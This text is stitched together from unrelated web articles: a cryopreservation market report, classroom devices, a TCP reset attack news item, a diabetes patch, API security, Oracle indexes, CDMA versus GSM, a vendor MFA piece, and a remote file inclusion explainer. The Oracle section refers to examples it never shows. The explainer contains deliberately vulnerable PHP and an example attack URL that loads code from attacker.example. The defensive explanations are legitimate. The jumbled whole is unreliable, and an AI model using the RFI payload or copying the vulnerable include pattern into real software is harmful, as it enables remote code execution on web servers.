Nitrogen boiling off from a cryogenic storage vessel displaces oxygen; when the oxygen concentration around a freezer drops to unacceptably low levels, the equipment cannot be used safely. Moreover, liquid nitrogen is extremely cold and can cause rapid frostbite or cold-contact burns on exposed skin that comes into contact with it. Accidental releases or overflows of liquid nitrogen pose hazards and cause property damage, and the most common cause of accidental releases is insufficient training in handling such hazardous materials. Leaks of LN2 into laboratories pose risks of asphyxiation, personal injury, and environmental harm, among others.
|Market|Liquid Nitrogen Cryopreservation Market|
|Analysis Period|2017 - 2028|
|Forecast Data|2021 - 2028|
|Segments Covered|By Application, By End-Use and By Geography|
|Regional Scope|North America, Europe, Asia Pacific, Latin America, and Middle East & Africa|
|Key Companies Profiled|CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others|
|Report Coverage|Market Trends, Drivers, Restraints, Competitive Analysis, Player Profiling, Regulation Analysis|
|Customization Scope|10 hrs of free customization and expert consultation|
The ability to replace organs and tissues on demand saves and improves millions of lives worldwide each year, producing public health benefits by curing numerous life-threatening diseases. Advanced organ preservation techniques may even allow for cutting-edge pretransplant interventions with the potential to improve transplant outcomes, such as immunomodulation or gene therapy approaches for functional augmentation in specialized laboratories. Such factors have resulted in high demand for liquid nitrogen cryopreservation, contributing to the overall growth of the global market.
The global liquid nitrogen cryopreservation market is segmented based on application and end-use. By application, the market is segmented into stem cells; sperm, semen, and testicular tissues; embryos and oocytes; and others. By end-use, it is segmented into stem cell banks, biotechnology and pharmaceutical organizations, contract research organizations, stem cell research laboratories, and research and academic institutes.
Based on application, the stem cells segment dominates the overall market, recording considerable revenue, and will continue to do so for the foreseeable future. Based on end-use, the stem cell research laboratories segment leads segmental growth with the dominating share.
Europe records considerable market share for liquid nitrogen cryopreservation
The increasing number of contract manufacturing organizations (CMOs) and contract research organizations (CROs), as well as increased R&D activity related to cell line development and stem cell research, are key factors driving the regional market. Furthermore, rising partnerships and agreements that expand business presence and the customer base will positively influence the target market's growth.
Asia Pacific registers fastest growing CAGR for liquid nitrogen cryopreservation market
Countries such as South Korea, Russia, India, and others are focusing on strengthening their research and development capabilities in response to COVID-19 and are spending on the development of advanced laboratories. As a result, the demand for liquid nitrogen freezers is increasing. Furthermore, favorable government business policies and the emergence of small and mid-sized players with innovative solutions will drive the global liquid nitrogen cryopreservation market.
The prominent players of the global liquid nitrogen cryopreservation market include CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others.
Market by Application
Market by End-Use
Market by Geography
The market in 2020 was valued at US$1,805.5 Mn, and the CAGR is estimated at 12.5% during the forecast period of 2021 to 2028
North America held the dominant position and Asia Pacific exhibited the fastest-growing CAGR
The prominent players of the global liquid nitrogen cryopreservation market include CUSTOM BIOGENIC SYSTEMS, Chart Industries, Linde, Taylor-Wharton, Antech Group Inc., Abeyance Cryo Solutions, Thermo Fisher Scientific, Inc., Worthington Industries, Inc., BIOLOGIX GROUP LTD, and others.
A survey finds that over 50 percent of all teachers report that they have more individual devices than ever before.
The goal of classroom computing is to put a device in the hands of every student: a one-to-one (1:1) ratio. More than 50 percent of all teachers across the nation now have this one-to-one, student-to-device ratio, up 10 percent from last year's numbers.
This is good news for students, according to the findings of a Michigan State University study which was conducted over the past 15 years. Providing a notebook or tablet to students resulted in better grades in English, writing, math, and science.
“It’s not like just providing a laptop to every student will automatically increase their achievement, but we find that it’s the first step,” Binbin Zheng, an assistant professor of technology and literacy education, reports.
How to Achieve Academic Success After Technology Deployment
In order for the technological devices to benefit the student, districts need the educator to buy-in to the new program, good tech support, professional development, and integration with curriculum. It also helps to choose the right device to give to the students.
A recent paper released by THE Journal advises that school IT executives need to create a matrix that matches and complements the curriculum goals. They also need to match students' cognitive potential. Whereas a notebook is great for older students, it may prove to be too complex for a K-3 one-to-one program.
When public schools embarked on one-to-one programs, students overwhelmingly wanted tablets: iPads, Microsoft Surfaces, and other such devices. But many executives believed that it was important for students to use devices that would better prepare them for college and career life. Very few people outside the classroom use tablets as their main, or even secondary, device.
A security researcher has developed a new attack for a well-known flaw in the TCP protocol that allows an attacker to effectively shut down targeted routers and terminate existing TCP sessions at will. The scenario has many security experts worried, given the ubiquity of TCP and the fact that there's an attack tool already circulating on the Internet.
The basic problem lies in the fact that existing TCP sessions can be reset by sending specially crafted RST (reset) or Syn (synchronization) packets to either of the machines involved in the session. This is in fact an intended feature of the protocol.
However, the source IP addresses on these packets can be forged, which makes it possible for attackers not involved in the TCP session to terminate the connection, causing a de facto denial of service.
Security experts have known for some time that such an attack was possible in theory, but had thought it to be impractical to implement in the real world because of the difficulty of guessing the random numbers used to establish new TCP sessions.
Machines on the receiving end of TCP packets look for this number as a way of determining the authenticity of incoming requests. The numbers are randomly generated and come from a pool of about 4 billion possible 32-bit sequences.
But a researcher named Paul Watson has discovered that machines receiving TCP packets will accept packets containing numbers that are within a certain range of the actual sequence number. This makes it far easier to create authentic-looking packets capable of shutting down TCP sessions, according to an analysis of the attack posted Tuesday by the National Infrastructure Security Coordination Center, Englands national clearinghouse for security data.
Known as a “window,” this range of acceptable sequence numbers is established during the initial TCP handshake and varies depending on the devices and applications involved. A larger window size makes it easier for this attack to succeed. And with an automated attack tool already out there, experts expect to see quite a bit of activity in the coming days.
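The arithmetic behind this is easy to sketch. Assuming, as a simplification, that a reset is accepted whenever its sequence number lands anywhere in the receive window, the number of spoofed packets an attacker must send drops from 2^32 to roughly 2^32 divided by the window size. A hypothetical illustration in Python:

```python
import math

SEQ_SPACE = 2 ** 32  # TCP sequence numbers are 32-bit values

def rst_guesses(window_size: int) -> int:
    """Spoofed RST packets needed to guarantee one lands in the window.

    Because a receiver accepts a reset whose sequence number falls anywhere
    inside its current window, an attacker can step through the sequence
    space in window-sized increments instead of trying all 2**32 values.
    """
    return math.ceil(SEQ_SPACE / window_size)

print(rst_guesses(1))       # 4294967296: exact match required, impractical
print(rst_guesses(16384))   # 262144: feasible in seconds on a fast link
print(rst_guesses(65536))   # 65536: trivial
```

The larger the negotiated window, the fewer guesses are needed, which is exactly why a larger window size makes the attack easier to carry out.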
“It takes about 15 seconds for the attack tool to resize the window and guess the number and crash the device,” said Chris Rouland, vice president of the X-Force research team at Internet Security Systems Inc. in Atlanta. “This certainly will become another tool in the arsenal [of attackers].”
Experts say BGP (Border Gateway Protocol) is likely to be most vulnerable to this issue because it relies on a persistent TCP connection between peers. ISPs use the protocol to exchange routing information, and resetting BGP connections often creates the need to rebuild routing tables altogether.
Many of the backbone service providers have updated their devices to guard against the new attack, Rouland said, as they were given advance notice of the public release of the information.
The likelihood of actual attacks using this technique is lessened somewhat by the fact that attackers need to know both the source and destination IP addresses as well as the source and destination ports for whatever connection they want to go after.
Also, using IPsec wherever possible to encrypt TCP sessions prevents attackers from being able to see TCP data for those sessions.
Watson plans to discuss the new technique in more detail at the CanSecWest security conference this week in Vancouver, British Columbia.
A team of scientists are working on a diabetes tracking wearable device
Scientists from the Centre for Nanoparticle Research at South Korea’s Institute for Basic Science have developed a wearable patch that accurately monitors glucose levels in diabetics and administers insulin treatment when required via micro-needles. Researchers hope this combination of automatic monitoring and injections will help diabetics more effectively regulate blood glucose fluctuations.
In order to keep track of blood sugar levels, diabetes sufferers need to prick themselves several times a day to take small samples of blood for testing. They also require regular injections of insulin to keep blood sugar levels at a safe level. It’s a full-time condition which requires constant vigilance, as regular rises in sugar levels in the blood over time can increase the risk of developing long-term complications. This relentless cycle of pricking and injecting, while not especially painful, can be tedious enough to become a chore for many; an issue that can lead to dangerous lapses.
IoT wearable provides non-invasive monitoring and treatment
The result of research from the group of international scientists led by Dae-Hyeong is a patch that can both monitor blood glucose levels through sweat and deliver insulin in a non-invasive manner. The team’s work was published in Nature Nanotechnology earlier this week.
The base of the patch is made up of gold-doped graphene, a strong and flexible material commonly used in wearable devices. The device captures sweat from the person’s skin, and sensors within the patch pick up on the sweat’s pH level and temperature changes; indicators of a high glucose level. Once high sugar levels are recognised, built-in heaters in the patch dissolve a layer of coating, exposing microneedles that release a drug called metformin that can regulate and reduce high blood sugar levels. Blood sugar readings are also wirelessly transmitted to a mobile device so that long term trends are simple to read and monitor.
Speaking with Newsmax, Dr Joel Zonszein, director of the Clinical Diabetes Center at Montefiore Medical Center in New York City, said the cost of the partially gold device will be an initial barrier.
However, he said: “They have proved the concept — that a sweat patch can do the monitoring and can deliver a drug transdermally [through the skin]. Trying to do something like this noninvasively really is the holy grail of diabetes. So, there may be a future for this, but there are many barriers to be overcome”.
There are several potential benefits of using IoT wearables for the treatment of diabetes.
Speaking exclusively to Internet of Business, Collette Johnson, director of medical at Plextek Consulting, said: “This is a real game-changer for type two diabetes, as unlike type one, the disease fluctuates and tends to affect people later in life. Adjusting to a new medical regime and diet can be difficult, but with intelligent monitoring it can help reduce complications in the long-term, which in turn reduces the cost of treatment and allows people more freedom.”
More widely, IoT technology stands to make a significant impact across the medical industry.
Johnson said: “IoT will have an enormous impact on healthcare, as it will allow patients to be treated in their homes but with an additional level of mobility due to its interfacing with smart city networks.” IoT technology, she added, could provide confidence to sufferers of a range of conditions, offering “freedom and opportunities to patients that traditionally feel constrained to their home due to their illness.”
API usage in application development has become standard.
APIs are a critical aspect of business delivery in the digital world – they connect mobile applications, the Internet of Things, and provide the structure that links internal business processes.
Considering the pervasiveness and importance of APIs, it's obvious that we should secure them – after all, we don't want hackers to use an API to access business information housed in mobile apps, devices in the home, or processes that could cripple a business if they were compromised.
According to Gartner, by 2022, API abuses will be the most-frequent attack vector resulting in data breaches for enterprise web applications.
In this article we’ll discuss top API security threats and API protection best practices.
APIs and modern web applications
APIs allow developers to create an open architecture for sharing functionality and data between applications.
APIs give client-side developers—both legitimate developers and potential system crackers—much more finely grained access into an application than a typical web app. This is because the granularity boundary for calls to back-end tiers moves from relatively secure internal tiers (those that reside safely in a DMZ) all the way out to the client application residing on the Internet.
The problem with APIs is that they often provide a roadmap describing the underlying implementation of an application—details that would otherwise be buried under layers of web app functionality.
This can give hackers valuable clues that could lead to attack vectors they might otherwise overlook. APIs tend to be extremely clear and self-documenting at their best, providing insight into internal objects and even internal database structure—all valuable intelligence for hackers. But increased visibility isn’t the only risk APIs introduce. Increasing the number of potential calls also increases the attack surface, meaning that a hacker simply has more to exploit.
Top API security threats
DoS attacks – In a Denial of Service (DoS) attack, the attacker typically floods the server or network with enormous numbers of requests, often carrying invalid (spoofed) return addresses. Such an attack can render an API non-functional if appropriate security precautions are not in place. And whether or not your API is publicly exposed, it may still be reachable by other people.
As these API DoS attacks become more common, and as organizations increasingly rely on APIs for their business needs, security professionals should proactively plan to deal with such attacks. Even if an API key (or access token) used for application authentication is disabled, a key can easily be reacquired through a standard browser request. Therefore, invalidating a current access token is not a long-term solution. If a DoS attack is traced back to a specific IP address, then blacklisting that IP address isn’t a long-term solution either, because the attacker can easily acquire a new one.
To prevent a massive amount of API requests that can cause a DDoS attack or other misuses of the API service, apply a limit to the number of requests in a given time interval for each API (also called spike arrest). When the rate is exceeded, block access from the API key at least temporarily, and return the 429 (too many requests) HTTP error code.
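A minimal sketch of such a spike arrest, assuming a per-key sliding window (class name, keys, and limits below are illustrative, not from any particular product):

```python
import collections

class SpikeArrest:
    """Minimal sliding-window rate limiter sketch, tracked per API key."""

    def __init__(self, max_requests: int, interval_seconds: float):
        self.max_requests = max_requests
        self.interval = interval_seconds
        self.timestamps = collections.defaultdict(collections.deque)

    def check(self, api_key: str, now: float) -> int:
        """Return the HTTP status to answer with: 200 allowed, 429 blocked."""
        window = self.timestamps[api_key]
        while window and window[0] <= now - self.interval:
            window.popleft()            # drop requests outside the window
        if len(window) >= self.max_requests:
            return 429                  # too many requests
        window.append(now)
        return 200

limiter = SpikeArrest(max_requests=3, interval_seconds=60)
print([limiter.check("key-1", t) for t in (0, 1, 2, 3, 61)])
# -> [200, 200, 200, 429, 200]
```

In a real gateway the same check would sit in front of every route, with the 429 response carrying a Retry-After header so well-behaved clients can back off.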
MITM attacks – A man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts, relays, or alters communications between two interacting systems and captures the private and confidential data passed between them. MITM attacks occur in two stages: interception and decryption.
API endpoints are often overlooked from a security standpoint. They live on for a long time after deployment, which makes developers and sysadmins less inclined to tinker with them for fear of breaking legacy systems relying on those APIs (think enterprises, banks, etc.). Endpoint hardening measures (hashes, key signing, and shared secrets, to name a few) are, therefore, easier to incorporate at the early stages of API development.
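One of the shared-secret measures mentioned above can be sketched with HMAC request signing; the endpoint recomputes the tag and rejects anything that does not match. The key and messages here are purely illustrative:

```python
import hashlib
import hmac

# Hypothetical shared-secret request signing: client and API endpoint hold
# the same key, so tampering with the message in transit invalidates the tag.
SECRET = b"demo-shared-secret"  # illustration only; store real keys securely

def sign(message: bytes, key: bytes = SECRET) -> str:
    return hmac.new(key, message, hashlib.sha256).hexdigest()

def verify(message: bytes, tag: str, key: bytes = SECRET) -> bool:
    # compare_digest avoids leaking information through timing differences
    return hmac.compare_digest(sign(message, key), tag)

tag = sign(b"GET /v1/orders?id=42")
assert verify(b"GET /v1/orders?id=42", tag)        # untouched request
assert not verify(b"GET /v1/orders?id=99", tag)    # altered in transit
```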
API protection best practices
Focus on authorization and authentication on the front end
APIs are connected to other software. Securing the code properly requires that developers take a multi-pronged approach. This starts with solid authentication, which is the process of checking to see if a person is who they say they are.
Enterprises have been moving away from simple password systems to multistep authentication with a growing emphasis on biometric solutions like fingerprints. Once the person is authenticated, they need to pass an authorization check and gain access to different types of information.
For instance, few employees need access to payroll data, but everyone should be able to read the company president’s blog. Finally, an enterprise needs to make sure that corporate data is kept safe. Increasingly, businesses encrypt information from inception to deletion. Previously, data was encrypted mainly when moving from place to place on the network. With encryption, if the bad guys somehow get in, ideally, they cannot see anything of value.
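The payroll-versus-blog example above can be reduced to a small authorization check; the roles and resources below are hypothetical:

```python
# A hypothetical role-based authorization table: authentication establishes
# who you are, authorization decides what that identity may touch.
PERMISSIONS = {
    "payroll": {"hr", "finance"},  # restricted to specific roles
    "president_blog": {"hr", "finance", "engineering", "sales"},  # everyone
}

def authorized(role: str, resource: str) -> bool:
    # Unknown resources default to an empty set, i.e. deny by default.
    return role in PERMISSIONS.get(resource, set())

assert authorized("engineering", "president_blog")
assert not authorized("engineering", "payroll")
assert authorized("hr", "payroll")
```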
Use Quotas and Throttling
If you produce an API that is used by a mobile application or particularly rich web client, then you will likely understand the user behavior of those applications' clients. If a typical user calls the API once or twice per minute, it's unlikely that you will encounter several thousand requests per second at any given time.
A behavioral change such as this is an indication that your API is being misused. Throttling also protects APIs from denial-of-service attacks and from spikes. It's possible to implement sophisticated throttling rules to redirect overflows of traffic to backup APIs to mitigate these issues.
Turn on SSL everywhere
Make SSL/TLS the rule for all APIs. In the 21st century, SSL isn’t a luxury; it is a basic requirement. Adding SSL/TLS—and applying this correctly—is an effective defense against the risk of man-in-the-middle attacks.
SSL/TLS provides integrity on all data exchanged between a client and a server, including important access tokens such as those used in OAuth. It optionally provides client-side authentication using certificates, which is important in many environments.
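In client code this is mostly a matter of not weakening the defaults. A sketch using the Python standard library:

```python
import ssl

# create_default_context() enables certificate validation and hostname
# checking, the two properties that defeat man-in-the-middle attacks.
context = ssl.create_default_context()
context.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse legacy protocols

assert context.verify_mode == ssl.CERT_REQUIRED
assert context.check_hostname is True
# context.wrap_socket(sock, server_hostname="api.example.com") would then
# fail the handshake if the server's certificate cannot be verified.
```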
Don’t rely on traditional solutions
Traditional solutions work based on signatures or known patterns and can only protect you from common, known attacks like SQL injection (SQLi), cross-site scripting (XSS), and cross-site request forgery (CSRF). These solutions can’t detect vulnerabilities in the unique logic of your APIs. On top of that, these “old attacks”, once popular, have become less common because of modern application architectures and development best practices. A few examples:
- Cross-Site Request Forgery (CSRF) and some reflected Cross-Site Scripting (XSS) attacks can’t be exploited in many modern web applications since they don’t use cookie-based authentication.
- SQL injections (SQLi) are becoming less common because application frameworks provide built-in solutions for developers to avoid them.
Attackers haven’t given up and have also evolved to keep up with the times. Your APIs are complex and unique and attackers take advantage of this by looking for vulnerabilities in the unique logic. These are things that can’t be identified by a signature and are too devious to be addressed with good development practices. Your API protection solution must be able to understand the unique API logic at a granular level to identify potential vulnerabilities and stop attacks.
API protection is a complex topic, and since APIs are an integral part of modern software development, this issue has to be approached carefully. If you’re not sure about what you have to do to protect your APIs, contact us today to help you out with your performance and security needs.
In the query to the PRODUCT table, I have a COMPANY_NO column. Since this company’s expansion has not occurred, all rows in the table have a COMPANY_NO = 1. What if I am a beginner and I have heard that indexes are good and have decided to index the COMPANY_NO column? Consider the following example which selects only certain columns from the PLAN_TABLE after executing the query.
The cost-based optimizer will analyze the index as bad and suppress it. The table must be reanalyzed after the index is created for the cost-based optimizer to make an informed choice. The index created on COMPANY_NO is correctly suppressed by Oracle internally (since it would access the entire table and index):
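A sketch of what this sequence might look like; PRODUCT and COMPANY_NO come from the text, while the other column and index names are hypothetical, and the plan line shown is the typical result:

```sql
-- Index the low-cardinality column, then explain the query
CREATE INDEX prod_idx1 ON product (company_no);

EXPLAIN PLAN FOR
SELECT product_id, qty
FROM   product
WHERE  company_no = 1;

SELECT operation, options, object_name
FROM   plan_table;

-- Typical output: TABLE ACCESS | FULL | PRODUCT
-- (the index on COMPANY_NO is suppressed)
```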
You can force an originally suppressed index to be used (bad choice), as follows:
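A sketch using the INDEX hint, with hypothetical column and index names:

```sql
SELECT /*+ INDEX(product prod_idx1) */ product_id, qty
FROM   product
WHERE  company_no = 1;
```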
Indexes can also be suppressed when they cause poorer performance by using the FULL hint:
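For example (column names hypothetical):

```sql
SELECT /*+ FULL(product) */ product_id, qty
FROM   product
WHERE  company_no = 1;
```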
Next, consider a similar example in an 11gR2 database on a faster server with a 25M row table where I am summing all rows together. Oracle is once again smart enough to do a full table scan since I am summing the entire table. A full table scan only scans the table, but if I force an index (as in the second example), it has to read many more blocks (almost 50 percent more), scanning both the table and the index (resulting in a query that is almost four times slower).
Now let’s try scanning the index and then go to the table (bad idea):
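A sketch of forcing the index on such a sum; the table and index names are hypothetical:

```sql
SELECT /*+ INDEX(sales sales_idx) */ SUM(amount)
FROM   sales;
-- Scans the index and then the table: many more block reads, and in the
-- scenario described above, roughly four times slower than the full scan.
```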
Bad indexes (indexing the wrong columns) can cause as much trouble as forgetting to use indexes on the correct columns. While Oracle’s cost-based optimizer generally suppresses poor indexes, problems can still develop when a bad index is used at the same time as a good index.
CDMA vs GSM: What’s the Difference?
March 27, 2018
CDMA and GSM are two acronyms that you will see regularly when reading about anything related to mobile telephony. This article explains what each of the two terms mean, how they are related, why they are different and why you should care.
CDMA (Code Division Multiple Access) and GSM (Global System for Mobile Communications) are the two main radio systems used in mobile telephones. Each is an umbrella term for a collective group of technologies run by the same entities.
What is the technology behind GSM: in simple terms?
We start with GSM as this radio access technology was developed first in the evolution of mobile communications.
GSM is a time-division system, whereby voice is broken down into smaller parts and transformed into digital data. This data is then allocated to a channel and a time slot; when there are multiple calls happening on one line, the receiver is able to ‘listen’ to the specific channel and time slot, combine the data, and replay the voice.
What is the technology behind CDMA: in simple terms?
CDMA is also a radio access technology, which allows us to fit multiple calls, connections and data streams onto one radio channel.
CDMA is a code-division system, whereby each call’s data is encoded with a unique key, then the calls are all transmitted at once. The receivers then use the unique key to divide the combined signal back into the individual voice streams.
Of the two systems, code division became more powerful and is considered a much more flexible technology. However, since it began, GSM has evolved to be quicker than CDMA. CDMA networks are ‘stuck’ at 3.6 Mbps, whereas GSM networks can theoretically transmit at 42 Mbps.
What CDMA vs. GSM Means to You
As a consumer the final call quality is not noticeably determined by the way your carrier has built their network, there may be some good and some bad CDMA and GSM networks, but there are several differences between the technologies that are key things to be aware of as a consumer.
If you want to swap your phone, then a GSM network is much better for you. That’s because GSM carriers put their customer information on a SIM card, which can be removed and inserted into another phone easily. With CDMA, by contrast, carriers in some countries used a network-based ‘white list’ to verify their subscribers. This means that you will require your carrier’s permission before you can go ahead and change phones.
3G CDMA networks generally are unable to make voice calls and transmit data at the same time, whereas 3G GSM networks can transmit these two data types simultaneously.
All this will surely make you ask: why would carriers ever have gone with CDMA if GSM came first and seems to have a lot of better options for consumers? The answer is that, in the evolution of mobile networks, when carriers began to switch from analog to digital technologies, CDMA was the best available technology. However, GSM technologies soon caught up with CDMA and then began to outperform it, but by that time a lot of carriers’ infrastructure was already set up and operational.
Although it is possible to switch from CDMA to GSM, many operators are choosing to develop and build out 4G and LTE services rather than investing money in areas that are now obsolete for many of their customers.
Critical Infrastructure Requires a Stronger Security Standard
Lessons From Colonial Pipeline and Other Attacks on Utilities Organizations
US citizens are feeling the consequences of what is thought to be the largest known cyberattack on a US fuel pipeline: the May 7 attack on the Colonial Pipeline. The details around the exact attack vector are still unknown. Amid the cut-off, a shortage of fuel in the southern United States resulted in panic buying, inflated prices and even the hashtag #GasShortage2021.
The hackers, thought to be linked to a European group called “DarkSide”, used ransomware, a type of malware that locks victims’ files until a payment is made, to attack Colonial Pipeline. The attack triggered a massive government response, yet the group claimed they “didn’t mean to cause problems.” It says a lot when the sophisticated hackers themselves are unaware of the potential consequences such attacks have on wider society.
A Ripple Effect of Dangerous Consequences
When we think about cyberattacks, we usually think of data breaches. But when these attacks are aimed at critical infrastructure, we see a strong physical impact that ripples and halts normality for large populations. For this reason, utilities and energy businesses as well as state, local and federal governments experience damage that goes far beyond cyberspace. These organizations are particularly vulnerable due to the physical assets that are at stake, and the large populations that depend on their services to resume normal life.
Just days before the Colonial Pipeline attack, a Norwegian energy firm was victim to a ransomware attack that required a shutdown of water and wastewater facilities — impacting 85 percent of the region’s population.
Earlier this year, the Florida Water Treatment Plant was hacked due to a password vulnerability on a dormant software application, which had no multi-factor authentication (MFA) practice in place. Frighteningly, the attack turned to a case of cyber-terrorism as the hacker adjusted dangerous chemical levels in the water. The attack had the very real potential to poison thousands of people.
The rising sophistication of these hackers and the astronomical consequences for the general public demand changes in security standards and practices. In a call for more regulation, President Biden required an increase in security standards and signed an executive order to improve the nation’s cybersecurity.
Zero Trust Is Not Only for Governments and the Private Sector Should Follow Their Lead
In Biden’s order, the importance of a Zero Trust architecture was highlighted, and as such, federal agencies are now required to develop a plan to implement it. He ordered the elimination of outdated security models and the adoption of security best practices, such as MFA. What’s more, the official statement from the White House urged privately held companies, such as energy and utilities organizations, to follow suit.
At HID, we could not agree with this statement more. We have a long history of working with the US federal government in enabling Zero Trust. Ten years ago, the US government deployed HID Personal Identity Verification (PIV) cards to secure the complete lifecycle for authentication and access of federal workers. To this day, this remains the largest deployment of an employer-to-employee public key infrastructure (PKI)-based MFA solution in the world. However, you don’t need to be as large as the federal government to achieve this level of security. HID makes this technology available and accessible to a wide range of organizations.
Your First Line of Defense Starts With MFA
While still not fully understood, the Colonial Pipeline attack is a stark reminder of the practices that should be in place. Time and time again, the critical need for strong MFA covering every access point is brought to our attention. At this time, it is impossible to say whether MFA could have prevented the Colonial Pipeline attack, but as attack methods continue to evolve and become more complex, the ways that users authenticate within organizations also need to evolve.
While a Zero Trust environment is at the core, it should be fortified with MFA everywhere — not just for certain systems, applications or users. It’s crystal clear that passwords alone are not enough to safeguard a business, especially those with ties to critical infrastructure. Instead, utilities organizations must deploy MFA solutions that replace passwords and provide a wide breadth of advanced, adaptable authentication options to close every gap.
Getting Started With MFA and Zero Trust
The point of MFA is to add multiple, additional factors to ensure that users are who they say they are. Basic MFA could combine something you know, such as a password, with something you have or are, such as a one-time verification code or a biometric, and is often powered by software with limited additional capabilities or security options. This is not enough when protecting organizations with critical infrastructure. Instead, implement advanced MFA built for your high-risk environment while meeting best practices and strengthening the walls of your organization:
- Select the right methods and authenticators for your own needs. In critical environments, using MFA that requires a password as your first authenticator is not viable. Instead, advanced MFA software gives you the option to use a diverse range of factors including biometrics, such as a fingerprint or facial recognition, with something you know or have such as a high-assurance smart card or security key. For increased protection, use MFA software that takes advantage of additional capabilities like step-up authentication, that can detect additional security factors such as location, and adjust required authentication as necessary.
- Utilize security standards and protocols. The good news is that security technologies are continuously advancing, but it’s imperative to ensure that your MFA software and devices support these technologies and will continue to do so. At HID, protocols such as OATH, FIDO and PKI certificate-based authentication, which is used by the US federal government, are made available to any business.
- Make MFA easy for your employees, but not for potential hackers. It's not uncommon for hackers to gain access through vulnerabilities of an organization’s own employees. Therefore, it’s important to make MFA an easy experience so that your employees can seamlessly comply and correctly authenticate. Deploy MFA that is convenient for both users and administrators to create a pain-free, risk-free experience that doesn’t get in the way of your security.
- Manage the whole authentication ecosystem. Enhance your MFA with a supporting, complete solution that manages your credentials and digital identities. Leveraging advanced software to power MFA is something, but what about what happens to your devices and credentials throughout their lifecycle full of potential vulnerabilities? Manage them from end-to-end to achieve complete visibility using a unified platform.
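As a concrete illustration of the OATH family mentioned in the list above, here is a minimal sketch of HOTP (RFC 4226), the counter-based algorithm that TOTP one-time codes build on; the secret below is the RFC's published test value:

```python
import hashlib
import hmac
import struct

def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HOTP (RFC 4226): HMAC-SHA-1 over the counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F                       # low nibble picks the slice
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

secret = b"12345678901234567890"                  # RFC 4226 test secret
print(hotp(secret, 0), hotp(secret, 1))           # 755224 287082 (RFC vectors)
```

A server verifies by computing the same value for the expected counter; TOTP simply derives the counter from the current time.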
In the wake of these cyberattacks and their devastating effects, it’s time to fortify our utilities from the inside out and accelerate towards an industry built on Zero Trust and advanced authentication.
Learn more on how to shift your authentication strategy to a Zero Trust model in our eBook: The Journey to Passwordless.
Jillian Belles is the IAM Director of Strategic Sales for HID Global, the leader in trusted identities. Jillian has been in the IT and securities industry for 24 years, specializing in providing subject matter expertise to high-compliance verticals like state and local government, higher education, energy, and utilities industries.
How does remote file inclusion work?
A remote file inclusion (RFI) occurs when a file from a remote web server is inserted into a web page. This can be done on purpose to display content from a remote web application but it can also happen by accident due to a misconfiguration of the respective programming language. Such vulnerabilities can lead to an RFI attack.
Even though this kind of file inclusion can occur in almost every kind of web application, those written in PHP code are more likely to be vulnerable to remote file inclusion attacks. This is because PHP provides native functions that allow the inclusion of remote files, while other languages usually require a workaround to imitate this behavior.
In order to include a remote file, you have to add a string with the URL of the file to an include function (in PHP) or its equivalent in another language. Then the web server of the website under attack makes a request to the remote file, fetches its contents, and includes it on the web page serving the content. The file is then processed by the parser of the language.
How can a web application be vulnerable to remote file inclusion?
By default, RFI is often disabled. PHP, for example, introduced a php.ini configuration option to disable RFI in version 5.2.0. There are only a few scenarios where it is actually needed in PHP code. Sometimes, developers enabled it on purpose, and sometimes it is enabled by default on older versions of the server-side programming language.
Usually developers enable such functionality to include local files, but without proper input validation, it is also possible to fetch data from a remote server. Therefore, in most cases when such functionality is enabled, the web application becomes vulnerable to both remote file inclusion and local file inclusion (LFI).
Exploiting a remote file inclusion vulnerability
Consider a developer who wants to include a local file corresponding to the page specified using the GET parameter. They have different PHP files, such as contact.php, main.php, and about.php, all of which provide different functionality to the website. Each file can be called using the following request that is sent to the index.php file:
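For instance, a request like `http://example.com/index.php?page=contact.php` (domain hypothetical) might reach code along these lines, a deliberately simplified sketch of a vulnerable implementation:

```php
<?php
// index.php: passes the user-supplied page name straight to include()
$page = $_GET['page'];       // e.g. "contact.php", completely unvalidated
include('pages/' . $page);   // the attacker controls part of this path
```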
While the developer expects that only files inside that folder will be included, it might be possible for an attacker to include files from another directory (LFI) or even from a completely different web server (RFI), especially if there is no whitelist of files. In fact, without a whitelist of permitted files, the attacker can change the filepath passed to the include function (or its equivalent in another language). The attacker can include a local file, but in a typical attack, they change the path to a file that resides on a server they control. This allows attackers to write malicious code inside a file without having to poison logs or otherwise inject code into the web server (which would be required for local file inclusion).
An attack might look like this:
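For instance (attacker domain hypothetical):

```
http://example.com/index.php?page=http://attacker.example/malicious.txt
```

The server fetches malicious.txt from the attacker's machine and executes whatever PHP code it contains.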
What is the impact of an exploited remote file inclusion?
The impact will differ depending on the type of the remote file inclusion attack and the execution permissions of the web server user. Any source code included from malicious files could be executed by the web server with the privileges of the web server user, making it possible to execute arbitrary code that could lead to issues such as sensitive information disclosure and code execution at the OS level. If the web server user has administrative privileges on the server, the danger goes beyond web application security and can lead to a full system compromise.
How to prevent remote file inclusion vulnerabilities
To prevent exploitation of the RFI vulnerability, make sure you disable the remote inclusion feature in the configuration of your application environment, especially if you do not need it. In PHP, you can set allow_url_include to '0' in php.ini. You should also validate user input before passing it to an include function. Unvalidated user input is the root cause of many vulnerabilities, such as cross-site scripting (XSS), SQL injection, local file inclusion (LFI), and many others.
If you really have to enable remote file inclusions, then work with a whitelist of files that are allowed to be included on your web application.
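One way to sketch such a whitelist is shown below in Python (the same idea applies to PHP's include); the page names and the fallback default are illustrative assumptions, not taken from any particular application:

```python
# Hypothetical sketch of whitelist-based page resolution (names are illustrative).
ALLOWED_PAGES = {
    "contact": "contact.php",
    "main": "main.php",
    "about": "about.php",
}

def resolve_page(page_param):
    # Any value not in the whitelist — including traversal paths and remote
    # URLs — falls back to a safe default instead of reaching include().
    return ALLOWED_PAGES.get(page_param, "main.php")
```

Because the user-supplied value is only ever used as a lookup key, an attacker-controlled path or URL can never reach the inclusion call.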
Vulnerability classification and severity table
|Classification||ID / Severity|
But that doesn’t mean Macs are perfectly safe and secure computers — after all, no computer is completely safe and secure on the Internet.
